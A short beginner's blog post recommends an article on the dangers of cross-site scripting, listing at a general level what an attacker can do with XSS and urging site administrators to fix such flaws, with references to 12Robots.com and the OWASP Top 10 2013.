Great Read: The perils of Cross-Site Scripting

XSS Attack Overview | Courtesy of www.acunetix.com

I have been searching the internet for a website that could easily describe the perils of cross site scripting (XSS). Of course some of you out there will argue that I should have visited OWASP. Yes. I have visited OWASP. However, I am still hungry for more information and I am looking for a website that will explain to me what I can do with cross site scripting is even if I am just a newb on web technologies and languages. So after doing some ctrl + click on some links provided by Google, I’ve managed to find the website of Jason Dean which discusses cross site scripting – What is possible with XSS? | 12Robots.com.

According to him, there are several things that you can do with XSS namely:

  • use the credibility of your site to run a phishing scheme

  • steal your users’ passwords

  • hijack your users’ sessions

  • try to launch an attack against the site administrator (you)

  • redirect your users to another site (gambling, porn, Google, affiliate link, whatever)

  • display inappropriate or mis-informative messages to your users

  • Or anything else that could be done with client-side executable code

I was quite amazed with the things you could do with XSS. I have never thought that using JavaScript you can pretty much do anything on a browser. At a security standpoint, XSS is very critical that it is on the top 3 list of OWASP (here is the PDF (OWASP Top 10 2013) file directly from OWASP). So if you are an admin of the website which is affected with XSS, you should immediately fix it since it could really affect visitors of your site.

References:

12Robots by Jason Dean (http://www.12robots.com/index.cfm/2010/9/14/Whats-Possible-with-XSS–Security-Series-81)

OWASP Top 10 2013 (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)

Advertisements

Care to comment?

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s